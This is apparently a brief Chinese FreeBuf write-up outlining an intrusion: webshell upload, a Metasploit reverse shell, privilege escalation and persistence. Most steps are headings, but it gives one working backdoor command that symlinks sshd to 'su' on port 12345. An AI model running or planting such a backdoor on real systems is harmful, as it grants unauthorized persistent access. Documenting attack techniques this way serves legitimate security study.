记一次权限维持

1. 外网打点
1.1.文件上传
1.2.burp抓包更改后缀名
1.3.哥斯拉连接
1.4.查看系统内核
该系统为linux系统且为x64架构
2. 提权
2.1. 制作msf木马
- 开启msf监听
- 制作木马
- 上传木马并执行
- 反弹成功
- 搜索可以用来提权的脚本
进行提权
利用可用脚本进行提权
3. 权限维持
ssh软连接后门
ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345
测试软连接
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录